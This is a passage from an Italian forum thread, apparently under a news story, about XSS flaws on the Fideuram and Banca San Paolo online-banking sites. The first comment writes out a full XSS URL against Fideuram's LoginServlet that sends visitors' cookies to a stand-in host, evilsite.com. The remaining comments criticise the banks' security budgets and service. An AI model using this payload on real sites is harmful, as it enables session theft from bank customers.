      possibilissimo. Inoltre, ovviamente nel sito i
      cracker possono inserire iframe con exploit e
      malware a
      piacimento.Ok, l'URL viene troncato da PI... le due righe seguenti vanno messe insieme...https://www.fideuramonline.it/script/LoginServlet?function=popup&msg= document.location.href="http://www.evilsite.com/readcookie.php?read="%2Bescape(document.cookie)
  • Naxalite scrive:
    Non solo Fideuram, ma anche San Paolo...
    Come già evidenziato da Alessandro Sappia sulla mailing listsikurezza nel messaggio 4782CEF4.5010406@ngi.it, la stessaidentica vulnerabilità XSS è presente sul sito di Banca San Paolo.Stiamo parlando di uno dei più grossi gruppi bancari italiani, gente che ha budget di *centinaia* di milioni dieuro per l'IT: possibile che non riescano a spendere qualchesoldino per auditing e vulnerability assessment seri?
    • pentolino scrive:
      Re: Non solo Fideuram, ma anche San Paolo...
      Lo sai perchè? Perchè hanno voluto il sito fighetto tutto pieno di funzioni carine e tutti a dire "oooh che bello", ma se sotto sotto è un colabrodo se ne accorgono in pochi e purtroppo in genere non ben intenzionati...Meno male che il conto presso di loro lo ho chiuso...
      • rotfl scrive:
        Re: Non solo Fideuram, ma anche San Paolo...
        - Scritto da: pentolino
        Lo sai perchè? Perchè hanno voluto il sito
        fighetto tutto pieno di funzioni carine e tutti a
        dire "oooh che bello"D'altronde gli stupidi li impressioni con il sito colorato e "che si muove" tutto, mica con la sicurezza...
      • rockroll scrive:
        Re: Non solo Fideuram, ma anche San Paolo...
        Da quando la Cariplo si è fusa con sti piemontsi di S.Paolo, ho avuto solo casini e disservizi, e non mi sono più fidato di fare transazioni on-line...
Chiudi i commenti